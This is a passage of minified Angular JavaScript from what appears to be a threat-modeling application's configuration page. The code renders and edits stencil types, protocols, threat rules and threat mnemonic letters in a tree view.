"),ne(6,mht,11,4,"ng-container",41),s(7,"\n "),u(),s(8,"\n "),Mt()),2&t){const e=V(4);g(4),F("ngIf",!e.IsPropOverwritten(e.selectedProperty)),g(2),F("ngIf",e.IsPropOverwritten(e.selectedProperty))}}function hht(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"div",16),s(2,"\n "),m(3,"div",17),s(4,"\n "),m(5,"mat-list",18),he("cdkDropListDropped",function(n){be(e);const r=V(3);return Me(r.drop(n,r.selectedProtocol.Properties))}),s(6,"\n "),m(7,"div",19),s(8),oe(9,"translate"),m(10,"button",20),he("click",function(){return be(e),Me(V(3).AddProperty())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n "),ne(15,tht,19,17,"mat-list-item",21),s(16,"\n "),ne(17,nht,10,5,"ng-container",9),s(18,"\n "),u(),s(19,"\n "),u(),s(20,"\n "),m(21,"div",22),s(22,"\n "),ne(23,cht,39,17,"ng-container",9),s(24,"\n "),ne(25,uht,9,2,"ng-container",9),s(26,"\n "),u(),s(27,"\n "),u(),s(28,"\n ")}if(2&t){const e=V(3);g(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),g(3),za("",e.selectedProtocol.Name," ",re(9,11,"general.Properties")," "),g(2),at("matTooltip",re(11,13,"general.Add")),g(5),F("ngForOf",e.selectedProtocol.Properties),g(2),F("ngIf",!e.selectedProtocol.IsDefault),g(6),F("ngIf",null==e.selectedProtocol.Properties?null:e.selectedProtocol.Properties.includes(e.selectedProperty)),g(2),F("ngIf",!e.selectedProtocol.IsDefault&&(null==e.defaultProtocol.Properties?null:e.defaultProtocol.Properties.includes(e.selectedProperty)))}}function fht(t,a){1&t&&(m(0,"div",25),s(1),oe(2,"translate"),oe(3,"translate"),u()),2&t&&(g(1),za("",re(2,2,"properties.Restrictions"),": ",re(3,4,"pages.config.noRestrictions"),""))}function pht(t,a){if(1&t&&(m(0,"div",25),s(1),oe(2,"translate"),u()),2&t){const e=V().$implicit,i=V(4);g(1),za("",re(2,2,"properties.Restrictions"),": ",i.GetStencilRestrictionsCount(e),"")}}function _ht(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",49),he("click",function(){const r=be(e).$implicit;return Me(V(4).selectedThreatRule=r)}),s(1,"\n "),m(2,"mat-icon",24),s(3,"arrow_right"),u(),s(4,"\n "),m(5,"div",25),s(6),u(),s(7,"\n "),ne(8,fht,4,6,"div",50),s(9,"\n "),ne(10,pht,3,4,"div",50),s(11,"\n "),m(12,"button",26),he("click",function(){const r=be(e).$implicit;return Me(V(4).DeleteThreat(r))}),oe(13,"translate"),m(14,"mat-icon"),s(15,"delete"),u()(),s(16,"\n "),u()}if(2&t){const e=a.$implicit,i=V(4);Ct("highlight-light",i.selectedThreatRule===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedThreatRule===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),g(6),ke(e.Name),g(2),F("ngIf",0==i.GetStencilRestrictionsCount(e)),g(2),F("ngIf",i.GetStencilRestrictionsCount(e)>0),g(2),at("matTooltip",re(13,9,"general.Delete"))}}function ght(t,a){1&t&&(m(0,"div",25),s(1),oe(2,"translate"),oe(3,"translate"),u()),2&t&&(g(1),za("",re(2,2,"properties.Restrictions"),": ",re(3,4,"pages.config.noRestrictions"),""))}function Cht(t,a){if(1&t&&(m(0,"div",25),s(1),oe(2,"translate"),u()),2&t){const e=V().$implicit,i=V(5);g(1),za("",re(2,2,"properties.Restrictions"),": ",i.GetStencilRestrictionsCount(e),"")}}function yht(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",28),he("click",function(){const r=be(e).$implicit;return Me(V(5).selectedThreatRule=r)}),s(1,"\n "),m(2,"mat-icon",24),s(3),u(),s(4,"\n "),m(5,"div",25),s(6),u(),s(7,"\n "),ne(8,ght,4,6,"div",50),s(9,"\n "),ne(10,Cht,3,4,"div",50),s(11,"\n "),u()}if(2&t){const e=a.$implicit,i=V(5);Ct("highlight-light",i.selectedThreatRule===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedThreatRule===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),g(3),ke(i.GetIcon(i.defaultProtocol)),g(3),ke(e.Name),g(2),F("ngIf",0==i.GetStencilRestrictionsCount(e)),g(2),F("ngIf",i.GetStencilRestrictionsCount(e)>0)}}function bht(t,a){if(1&t&&(bt(0),s(1,"\n "),it(2,"mat-divider"),s(3,"\n "),m(4,"div",19),s(5),oe(6,"translate"),u(),s(7,"\n "),ne(8,yht,12,9,"mat-list-item",27),s(9,"\n "),Mt()),2&t){const e=V(4);g(5),za("",e.defaultProtocol.Name," ",re(6,3,"general.Threats"),""),g(3),F("ngForOf",e.elementTypeThreats)}}function Mht(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"div",16),s(2,"\n "),m(3,"div",17),s(4,"\n "),m(5,"mat-list",18),he("cdkDropListDropped",function(n){be(e);const r=V(3);return Me(r.dropThreat(n,r.typeThreats))}),s(6,"\n "),m(7,"div",19),s(8),oe(9,"translate"),m(10,"button",20),he("click",function(){return be(e),Me(V(3).AddThreat())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n "),ne(15,_ht,17,11,"mat-list-item",47),s(16,"\n "),ne(17,bht,10,5,"ng-container",9),s(18,"\n "),u(),s(19,"\n "),u(),s(20,"\n "),m(21,"div",22),s(22,"\n "),it(23,"app-threat-rule",48),s(24,"\n "),u(),s(25,"\n "),u(),s(26,"\n ")}if(2&t){const e=V(3);g(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),g(3),za("",e.selectedProtocol.Name," ",re(9,13,"general.Threats")," "),g(2),at("matTooltip",re(11,15,"general.Add")),g(5),F("ngForOf",e.typeThreats),g(2),F("ngIf",!e.selectedProtocol.IsDefault),g(6),F("node",e.selectedNode)("threatRule",e.selectedThreatRule)("canEdit",!0)("canEditName",!0)}}function vht(t,a){if(1&t){const e=Ye();m(0,"mat-tab-group",12),he("selectedIndexChange",function(n){return be(e),Me(V(2).SetSelectedTabIndex(n))}),s(1,"\n "),m(2,"mat-tab",13),oe(3,"translate"),s(4,"\n "),ne(5,hht,29,15,"ng-template",14),s(6,"\n "),u(),s(7,"\n "),m(8,"mat-tab",13),oe(9,"translate"),s(10,"\n "),ne(11,Mht,27,17,"ng-template",14),s(12,"\n "),u(),s(13,"\n "),u()}if(2&t){const e=V(2);F("selectedIndex",e.GetSelectedTabIndex()),g(2),Kc("label","",re(3,5,"general.Properties")," (",null==e.selectedProtocol||null==e.selectedProtocol.Properties?null:e.selectedProtocol.Properties.length,")"),g(6),Kc("label","",re(9,7,"general.Threats")," (",null==e.typeThreats?null:e.typeThreats.length,")")}}function Aht(t,a){if(1&t&&(m(0,"div",25),s(1),u()),2&t){const e=V().$implicit;g(1),ke(e.Letter)}}function Tht(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",49),he("click",function(){const r=be(e).$implicit;return Me(V(3).selectedMnemonicLetter=r)}),s(1,"\n "),m(2,"mat-icon",24),s(3,"arrow_right"),u(),s(4,"\n "),ne(5,Aht,2,1,"div",50),s(6,"\n "),m(7,"div",25),s(8),u(),s(9,"\n "),m(10,"button",26),he("click",function(){const r=be(e).$implicit;return Me(V(3).DeleteMnemonicLetter(r))}),oe(11,"translate"),m(12,"mat-icon"),s(13,"delete"),u()(),s(14,"\n "),u()}if(2&t){const e=a.$implicit,i=V(3);Ct("highlight-light",i.selectedMnemonicLetter===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedMnemonicLetter===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),g(5),F("ngIf",e.Letter),g(3),ke(e.Name),g(2),at("matTooltip",re(11,8,"general.Delete"))}}function Eht(t,a){if(1&t){const e=Ye();m(0,"button",39),he("click",function(){return be(e),Me(V(4).selectedMnemonicLetter.Name="")}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Dht(t,a){if(1&t&&(m(0,"mat-option",63),s(1),u()),2&t){const e=a.$implicit;at("matTooltip",e.Description),F("value",e.ID),g(1),ct("\n ",e.Name,"\n ")}}function xht(t,a){if(1&t&&(m(0,"mat-optgroup",13),s(1,"\n "),ne(2,Dht,2,3,"mat-option",62),s(3,"\n "),u()),2&t){const e=a.$implicit;F("label",e.Name),g(2),F("ngForOf",e.ThreatCategories)}}function wht(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"div",59),s(3,"\n "),m(4,"mat-form-field",32),s(5,"\n "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"input",33),he("ngModelChange",function(n){return be(e),Me(V(3).selectedMnemonicLetter.Name=n)}),u(),s(11,"\n "),ne(12,Eht,6,3,"button",34),s(13,"\n "),u(),s(14,"\n "),it(15,"br"),s(16,"\n "),m(17,"mat-form-field",32),s(18,"\n "),m(19,"mat-label"),s(20),oe(21,"translate"),u(),s(22,"\n "),m(23,"input",33),he("ngModelChange",function(n){return be(e),Me(V(3).selectedMnemonicLetter.Letter=n)}),u(),s(24,"\n "),u(),s(25,"\n "),it(26,"br"),s(27,"\n "),m(28,"mat-form-field",10),s(29,"\n "),m(30,"mat-label"),s(31),oe(32,"translate"),u(),s(33,"\n "),m(34,"input",33),he("ngModelChange",function(n){return be(e),Me(V(3).selectedMnemonicLetter.Description=n)}),u(),s(35,"\n "),u(),s(36,"\n "),m(37,"mat-form-field",10),s(38,"\n "),m(39,"mat-label"),s(40),oe(41,"translate"),u(),s(42,"\n "),m(43,"mat-select",60),he("valueChange",function(n){return be(e),Me(V(3).selectedMnemonicLetter.threatCategoryID=n)}),s(44,"\n "),ne(45,xht,4,2,"mat-optgroup",61),s(46,"\n "),u(),s(47,"\n "),u(),s(48,"\n "),u(),s(49,"\n "),Mt()}if(2&t){const e=V(3);g(7),ke(re(8,16,"general.Name")),g(3),at("matTooltip",e.selectedMnemonicLetter.Name),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedMnemonicLetter.Name),g(2),F("ngIf",e.selectedMnemonicLetter.Name),g(8),ke(re(21,18,"properties.Letter")),g(3),at("matTooltip",e.selectedMnemonicLetter.Letter),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedMnemonicLetter.Letter),g(8),ke(re(32,20,"properties.Description")),g(3),at("matTooltip",e.selectedMnemonicLetter.Description),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedMnemonicLetter.Description),g(6),ke(re(41,22,"general.ThreatCategory")),g(3),F("value",e.selectedMnemonicLetter.threatCategoryID),g(2),F("ngForOf",e.GetThreatCategoryGroups())}}function Iht(t,a){if(1&t&&(m(0,"th"),s(1),u()),2&t){const e=a.$implicit;g(1),ke(e.Letter)}}function Rht(t,a){if(1&t){const e=Ye();m(0,"td")(1,"mat-checkbox",66),he("change",function(n){const c=be(e).$implicit,d=V().$implicit;return Me(V(4).OnMnemonicElementThreat(n,c,d))}),u()()}if(2&t){const e=a.$implicit,i=V().$implicit;g(1),F("checked",e.AffectedElementTypes.includes(i))}}function Sht(t,a){if(1&t&&(m(0,"tr"),s(1,"\n "),m(2,"td"),s(3),u(),s(4,"\n "),ne(5,Rht,2,1,"td",65),s(6,"\n "),u()),2&t){const e=a.$implicit,i=V(4);g(3),ke(i.GetElementTypeName(e)),g(2),F("ngForOf",i.selectedThreatMnemonic.Letters)}}function kht(t,a){if(1&t&&(m(0,"div",64),s(1,"\n "),m(2,"table"),s(3,"\n "),m(4,"tr"),s(5,"\n "),it(6,"th"),s(7,"\n "),ne(8,Iht,2,1,"th",65),s(9,"\n "),u(),s(10,"\n "),ne(11,Sht,7,2,"tr",65),s(12,"\n "),u(),s(13,"\n "),u()),2&t){const e=V(3);g(8),F("ngForOf",e.selectedThreatMnemonic.Letters),g(3),F("ngForOf",e.GetMnemonicElementTypes())}}function Pht(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n "),m(2,"div",16),s(3,"\n "),m(4,"div",17),s(5,"\n "),m(6,"mat-list",18),he("cdkDropListDropped",function(n){be(e);const r=V(2);return Me(r.drop(n,r.selectedThreatMnemonic.Letters))}),s(7,"\n "),m(8,"div",19),s(9),oe(10,"translate"),m(11,"button",20),he("click",function(){return be(e),Me(V(2).AddMnemonicLetter())}),oe(12,"translate"),m(13,"mat-icon"),s(14,"add"),u()()(),s(15,"\n "),ne(16,Tht,15,10,"mat-list-item",47),s(17,"\n "),u(),s(18,"\n "),u(),s(19,"\n "),m(20,"div",22),s(21,"\n "),ne(22,wht,50,24,"ng-container",9),s(23,"\n "),u(),s(24,"\n "),u(),s(25,"\n "),ne(26,kht,14,2,"div",58),s(27,"\n "),u()}if(2&t){const e=V(2);g(6),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),g(3),za("",e.selectedThreatMnemonic.Name," ",re(10,10,"properties.Letters")," "),g(2),at("matTooltip",re(12,12,"general.Add")),g(5),F("ngForOf",e.selectedThreatMnemonic.Letters),g(6),F("ngIf",e.selectedMnemonicLetter&&e.selectedThreatMnemonic.Letters.includes(e.selectedMnemonicLetter)),g(4),F("ngIf",(null==e.selectedThreatMnemonic.Letters?null:e.selectedThreatMnemonic.Letters.length)>0)}}function Oht(t,a){if(1&t&&(m(0,"div",5),s(1,"\n "),m(2,"h2"),s(3),u(),s(4,"\n "),ne(5,vut,8,5,"mat-form-field",6),s(6,"\n "),ne(7,Aut,8,5,"mat-form-field",6),s(8,"\n "),ne(9,Tut,8,5,"mat-form-field",6),s(10,"\n "),ne(11,Zut,16,10,"mat-tab-group",7),s(12,"\n "),ne(13,eht,1,1,"app-stencil-type-template",8),s(14,"\n "),ne(15,vht,14,9,"mat-tab-group",7),s(16,"\n "),ne(17,Pht,28,14,"div",9),s(18,"\n"),u()),2&t){const e=V();g(3),ke(e.selectedNode.name()),g(2),F("ngIf",e.isStencilType),g(2),F("ngIf",e.isStencilTypeTemplate),g(2),F("ngIf",e.isStencilThreatMnemonic),g(2),F("ngIf",e.isStencilType),g(2),F("ngIf",e.isStencilTypeTemplate),g(2),F("ngIf",e.isProtocol),g(2),F("ngIf",e.isStencilThreatMnemonic)}}function Nht(t,a){if(1&t&&(m(0,"span",69),s(1),oe(2,"translate"),u()),2&t){const e=V(2).item;g(1),ke(re(2,1,e.DisplayName))}}function Lht(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),ne(2,Nht,3,3,"span",67),s(3," \n "),m(4,"button",68),he("click",function(){be(e);const n=V().item;return Me(V().OnMoveUpProperty(n))}),s(5,"\n "),m(6,"mat-icon"),s(7,"arrow_upward"),u(),s(8,"\n "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n "),u(),s(13,"\n "),m(14,"button",68),he("click",function(){be(e);const n=V().item;return Me(V().OnMoveDownProperty(n))}),s(15,"\n "),m(16,"mat-icon"),s(17,"arrow_downward"),u(),s(18,"\n "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n "),u(),s(23,"\n "),Mt()}if(2&t){const e=V().item;g(2),F("ngIf",e),g(8),ke(re(11,3,"nav-tree.moveUp")),g(10),ke(re(21,5,"nav-tree.moveDown"))}}function zht(t,a){if(1&t&&(s(0,"\n "),ne(1,Lht,24,7,"ng-container",9),s(2,"\n ")),2&t){const e=a.item,i=V();g(1),F("ngIf",i.IsProperty(e))}}let Wht=(()=>{class t extends xa{constructor(e,i,n,r){super(),this.theme=e,this.dataService=i,this.dialog=n,this.locStorageService=r,this.menuTopLeftPosition={x:"0",y:"0"},i.ConfigChanged.subscribe(c=>{c&&this.createNodes()})}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e,this.selectedProperty=this.selectedThreatRule=null}get isStencilType(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof oM}get selectedType(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.data}get selectedElementType(){var e;return null!==(e=this.selectedType)&&void 0!==e&&e.ElementTypeID?this.dataService.Config.GetStencilElementType(this.selectedType):null}get currentPropertyOverwriting(){var e;return null===(e=this.selectedType.PropertyOverwrites)||void 0===e?void 0:e.find(i=>i.Key==this.selectedProperty.ID)}get typeThreats(){return this.selectedType?this.isStencilType?this.dataService.Config.GetThreatRules().filter(e=>{var i;return(null===(i=e.StencilRestriction)||void 0===i?void 0:i.stencilTypeID)==this.selectedType.ID}):this.isProtocol?this.dataService.Config.GetThreatRules().filter(e=>{var i;return(null===(i=e.ProtocolRestriction)||void 0===i?void 0:i.protocolID)==this.selectedProtocol.ID}):void 0:null}get elementTypeThreats(){return this.selectedElementType?this.dataService.Config.GetThreatRules().filter(e=>{var i;return(null===(i=e.StencilRestriction)||void 0===i?void 0:i.stencilTypeID)==this.selectedElementType.ID}):null}get isTypeThreat(){return!(!this.selectedThreatRule||!this.selectedType)&&this.selectedThreatRule.StencilRestriction.stencilTypeID==this.selectedType.ID}get isStencilTypeTemplate(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof rM}get selectedTypeTemplate(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.data}get isProtocol(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Lu}get selectedProtocol(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.data}get defaultProtocol(){return Lu.GetDefaultType(this.dataService.Config)}get isStencilThreatMnemonic(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof sM}get selectedThreatMnemonic(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.data}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}IsProperty(e){return"DisplayName"in e&&"ID"in e}OnMoveUpProperty(e){let i=this.selectedType.Properties;if(0!=i.findIndex(n=>n.ID==e.ID)){let n=i.findIndex(r=>r.ID==e.ID);i.splice(n,0,i.splice(n-1,1)[0])}}OnMoveDownProperty(e){let i=this.selectedType.Properties;if(i.findIndex(n=>n.ID==e.ID)!=i.length-1){let n=i.findIndex(r=>r.ID==e.ID);i.splice(n,0,i.splice(n+1,1)[0])}}GetSelectedTabIndex(){let e=this.locStorageService.Get(si.PAGE_CONFIG_STENCILS_TAB_INDEX);return null!=e?e:0}SetSelectedTabIndex(e){this.locStorageService.Set(si.PAGE_CONFIG_STENCILS_TAB_INDEX,e)}AddProperty(){let e=[];e.push(...this.selectedType.Properties.map(n=>n.DisplayName)),!this.selectedType.IsDefault&&this.selectedElementType.Properties&&e.push(...this.selectedElementType.Properties.map(n=>n.DisplayName));let i=Gi.FindUniqueName("New Property",e);this.selectedType.Properties.push({DisplayName:i,ID:Fo(),Tooltip:"",HasGetter:!1,Editable:!0,Type:Ii.CheckBox,DefaultValue:!1}),this.selectedProperty=this.selectedType.Properties[this.selectedType.Properties.length-1]}DeleteProperty(e){let i=this.selectedType.Properties.indexOf(e);i>=0&&this.selectedType.Properties.splice(i,1)}GetElementPropertyValue(e){var i;let n=e.DefaultValue,r=null===(i=this.selectedType.PropertyOverwrites)||void 0===i?void 0:i.find(c=>c.Key==e.ID);return r&&(n=r.Value),e.Type==Ii.ProtocolSelect?r&&(null==n?void 0:n.length)>0?this.dataService.Config.GetProtocols().filter(c=>n.includes(c.ID)).map(c=>c.Name).join(", "):"[ ]":e.Type==Ii.LowMediumHighSelect?An.ToString(n):n}OverwriteProperty(){this.selectedType.PropertyOverwrites||(this.selectedType.PropertyOverwrites=[]),this.selectedType.PropertyOverwrites.push({Key:this.selectedProperty.ID,Value:this.selectedProperty.DefaultValue})}UnOverwriteProperty(){this.selectedType.PropertyOverwrites.splice(this.selectedType.PropertyOverwrites.indexOf(this.selectedType.PropertyOverwrites.find(e=>e.Key==this.selectedProperty.ID)),1)}IsPropOverwritten(e){var i;return null===(i=this.selectedType.PropertyOverwrites)||void 0===i?void 0:i.find(n=>n.Key==e.ID)}GetPropertyTypes(){return yG.GetMappableTypeNames()}AddThreat(){let e;this.isStencilType?(e=this.dataService.Config.CreateThreatRule(this.dataService.Config.StencilThreatRuleGroups,on.Stencil),e.StencilRestriction.stencilTypeID=this.selectedType.ID):(e=this.dataService.Config.CreateThreatRule(this.dataService.Config.StencilThreatRuleGroups,on.Protocol),e.ProtocolRestriction.protocolID=this.selectedProtocol.ID),e.Name=Gi.FindUniqueName(this.selectedType.Name,this.dataService.Config.GetThreatRules().map(i=>i.Name)),this.selectedThreatRule=e}DeleteThreat(e){this.dataService.Config.DeleteThreatRule(e),e==this.selectedThreatRule&&(this.selectedThreatRule=null)}GetStencilRestrictionsCount(e){var i;let n=0;return!(null===(i=e.StencilRestriction)||void 0===i)&&i.DetailRestrictions&&e.StencilRestriction.DetailRestrictions.forEach(r=>{(r.RestType==ya.Property&&r.PropertyRest||r.RestType==ya.PhysicalElement&&r.PhyElementRest)&&(n+=1)}),n}AddTemplateDFD(){const e=this.dataService.Config.CreateStencilTypeTemplate();e.Name=this.selectedType.Name+" Module",e.CanEditInWhichDiagram=!1,e.ListInHWDiagram=!1,e.ListInUCDiagram=!0,e.ListInElementTypeIDs=[];const i=[];i.push(this.dataService.Config.GetStencilTypes().find(r=>r.ElementTypeID==Et.LogProcessing&&1==r.IsDefault)),i.push(this.dataService.Config.GetStencilTypes().find(r=>r.ElementTypeID==Et.LogDataStore&&1==r.IsDefault)),i.push(this.dataService.Config.GetStencilTypes().find(r=>r.ElementTypeID==Et.PhyTrustArea&&1==r.IsDefault)),e.StencilTypes=i,e.Layout[0].name=this.selectedType.Name+" Handler",e.Layout[0].x=20,e.Layout[0].y=40,e.Layout[1].name=this.selectedType.Name+" Data Storage",e.Layout[1].x=20,e.Layout[1].y=200,e.Layout[2].name=this.selectedType.Name+" Module",e.Layout[2].x=e.Layout[2].y=0,e.Layout[2].width=180,e.Layout[2].height=290,this.selectedType.TemplateDFD=e,this.createNodes();const n=this.selectedType;setTimeout(()=>{this.selectedNode=this.FindNodeOfObject(n)},100)}DeleteTemplate(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&(this.dataService.Config.DeleteStencilTypeTemplate(e),this.createNodes())})}AddMnemonicLetter(){this.selectedThreatMnemonic.Letters.push({Name:Gi.FindUniqueName("Letter",this.selectedThreatMnemonic.Letters.map(e=>e.Name)),Letter:"",Description:"",AffectedElementTypes:[],threatCategoryID:"",ID:Fo()})}DeleteMnemonicLetter(e){const i=this.selectedThreatMnemonic.Letters.findIndex(n=>n.Name==e.Name&&n.Letter==e.Letter);i>=0&&this.selectedThreatMnemonic.Letters.splice(i,1)}OnMnemonicElementThreat(e,i,n){if(e.checked)i.AffectedElementTypes.push(n);else{const r=i.AffectedElementTypes.indexOf(n);r>=0&&i.AffectedElementTypes.splice(r,1)}}GetMnemonicElementTypes(){return Sc.GetTypes()}GetElementTypeName(e){return Sc.ToString(e)}GetStencilTypes(){let e=this.dataService.Config.GetStencilTypes();return e.sort((i,n)=>n.IsDefault?1:i.ElementTypeID-n.ElementTypeID),e}GetThreatCategoryGroups(){return this.dataService.Config.GetThreatCategoryGroups().filter(e=>e.ThreatCategories.length>0)}GetProtocols(){return this.dataService.Config.GetProtocols()}GetIcon(e){return e instanceof Lu?rs.Icon:Sc.Icon(e.ElementTypeID)}GetNamesOfIDs(e,i){return e.filter(n=>i.includes(n.ID)).map(n=>n.GetProperty("Name")).join(", ")}drop(e,i){Qs(i,e.previousIndex,e.currentIndex)}dropThreat(e,i){const n=this.dataService.Config.GetThreatRules().indexOf(i[e.previousIndex]),r=this.dataService.Config.GetThreatRules().indexOf(i[e.currentIndex]);this.dataService.Config.MoveItemInThreatRules(n,r)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=(Y,te)=>{let pe={name:()=>Y.Name,canSelect:!0,isBold:Y.IsDefault,data:Y,canMoveUpDown:!0,onMoveUp:()=>{let Re=this.dataService.Config.GetStencilTypes(),Fe=this.dataService.Config.GetStencilTypes().filter(et=>et.ElementTypeID==Y.ElementTypeID),Ne=Fe.findIndex(et=>et.ID==Y.ID);if(0!=Ne){let et=Re.findIndex(ut=>ut.ID==Fe[Ne-1].ID);this.dataService.Config.MoveItemInStencilTypes(Re.findIndex(ut=>ut.ID==Y.ID),et),te.children.splice(Ne,0,te.children.splice(Ne-1,1)[0])}},onMoveDown:()=>{let Re=this.dataService.Config.GetStencilTypes(),Fe=this.dataService.Config.GetStencilTypes().filter(et=>et.ElementTypeID==Y.ElementTypeID),Ne=Fe.findIndex(et=>et.ID==Y.ID);if(Ne!=Fe.length-1){let et=Re.findIndex(ut=>ut.ID==Fe[Ne+1].ID);this.dataService.Config.MoveItemInStencilTypes(Re.findIndex(ut=>ut.ID==Y.ID),et),te.children.splice(Ne,0,te.children.splice(Ne+1,1)[0])}}};return pe.canDelete=pe.canRename=pe.canDuplicate=!Y.IsDefault,pe.canRename&&(pe.onRename=Re=>pe.data.Name=Re),pe.canDelete&&(pe.onDelete=()=>{this.dialog.OpenDeleteObjectDialog(Y).subscribe(Re=>{Re&&(this.dataService.Config.DeleteStencilType(pe.data),pe==this.selectedNode&&(this.selectedNode=null),this.createNodes())})}),pe.canDuplicate&&(pe.onDuplicate=()=>{let Re=this.dataService.Config.CreateStencilType(Y.ElementTypeID);Re.CopyFrom(Y.Data),Re.Name=Re.Name+"-Copy",this.createNodes(),this.selectedNode=this.FindNodeOfObject(Re),this.selectedNode.isRenaming=!0}),pe},n=(Y,te,pe)=>{let Re={name:()=>Y,canSelect:!1,children:[]};return pe&&(Re.icon=pe),1==te.length?(Re.canAdd=!0,Re.onAdd=()=>{let Fe=this.dataService.Config.CreateStencilType(te[0]);this.createNodes(),this.selectedNode=this.FindNodeOfObject(Fe),this.selectedNode.isRenaming=!0},this.dataService.Config.GetStencilTypes().filter(Fe=>Fe.ElementTypeID==te[0]).forEach(Fe=>{let Ne=i(Fe,Re);Re.children.push(Ne)})):te.forEach(Fe=>{let Ne=n(Sc.ToString(Fe),[Fe]);Re.children.push(Ne)}),Re};this.Nodes.push(n("Processing",[Et.LogProcessing,Et.PhyProcessing],Vp.Icon)),this.Nodes.push(n("Data Store",[Et.LogDataStore,Et.PhyDataStore],Bp.Icon)),this.Nodes.push(n("External Entity",[Et.LogExternalEntity,Et.PhyExternalEntity],Hp.Icon)),this.Nodes.push(n("Data Flow",[Et.DataFlow],rs.Icon)),this.Nodes.push(n("Physical Link",[Et.PhysicalLink],lf.Icon)),this.Nodes.push(n("Interface",[Et.Interface],Nu.Icon)),this.Nodes.push(n("Trust Area",[Et.LogTrustArea,Et.PhyTrustArea],Up.Icon)),this.Nodes.forEach(Y=>Y.hasMenu=!0);let r={name:()=>"Protocol",canSelect:!1,canAdd:!0,onAdd:()=>{let Y=this.dataService.Config.CreateProtocol();this.createNodes(),this.selectedNode=this.FindNodeOfObject(Y),this.selectedNode.isRenaming=!0},children:[]},c=(Y,te)=>{let pe={name:()=>Y.Name,canSelect:!0,data:Y,isBold:Y.IsDefault,canRename:!Y.IsDefault,onRename:Re=>pe.data.Name=Re,canDelete:!Y.IsDefault,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Y).subscribe(Re=>{Re&&(this.dataService.Config.DeleteProtocol(pe.data),pe==this.selectedNode&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!Y.IsDefault,onDuplicate:()=>{let Re=this.dataService.Config.CreateProtocol();Re.CopyFrom(Y.Data),Re.Name=Re.Name+"-Copy",this.createNodes(),this.selectedNode=this.FindNodeOfObject(Re),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let Re=this.dataService.Config.GetProtocols();if(0!=Re.findIndex(Fe=>Fe.ID==Y.ID)){let Fe=Re.findIndex(Ne=>Ne.ID==Y.ID);this.dataService.Config.MoveItemInProtocols(Fe,Fe-1),te.children.splice(Fe,0,te.children.splice(Fe-1,1)[0])}},onMoveDown:()=>{let Re=this.dataService.Config.GetProtocols();if(Re.findIndex(Fe=>Fe.ID==Y.ID)!=Re.length-1){let Fe=Re.findIndex(Ne=>Ne.ID==Y.ID);this.dataService.Config.MoveItemInProtocols(Fe,Fe+1),te.children.splice(Fe,0,te.children.splice(Fe+1,1)[0])}}};return pe};this.dataService.Config.GetProtocols().forEach(Y=>r.children.push(c(Y,r))),this.Nodes.find(Y=>"Data Flow"==Y.name()).children.push(r);let d={name:()=>"Template",canSelect:!1,icon:"view_module",canAdd:!0,onAdd:()=>{let Y=this.dataService.Config.CreateStencilTypeTemplate();this.createNodes(),this.selectedNode=this.FindNodeOfObject(Y),this.selectedNode.isRenaming=!0},children:[]},T=(Y,te)=>{let pe={name:()=>Y.Name,canSelect:!0,data:Y,canRename:!0,onRename:Re=>pe.data.Name=Re,canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Y).subscribe(Re=>{Re&&(this.dataService.Config.DeleteStencilTypeTemplate(pe.data),pe==this.selectedNode&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!0,onDuplicate:()=>{let Re=this.dataService.Config.CreateStencilTypeTemplate();Re.CopyFrom(Y.Data),Re.Name=Re.Name+"-Copy",this.createNodes(),this.selectedNode=this.FindNodeOfObject(Re),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let Re=this.dataService.Config.GetStencilTypeTemplates();if(0!=Re.findIndex(Fe=>Fe.ID==Y.ID)){let 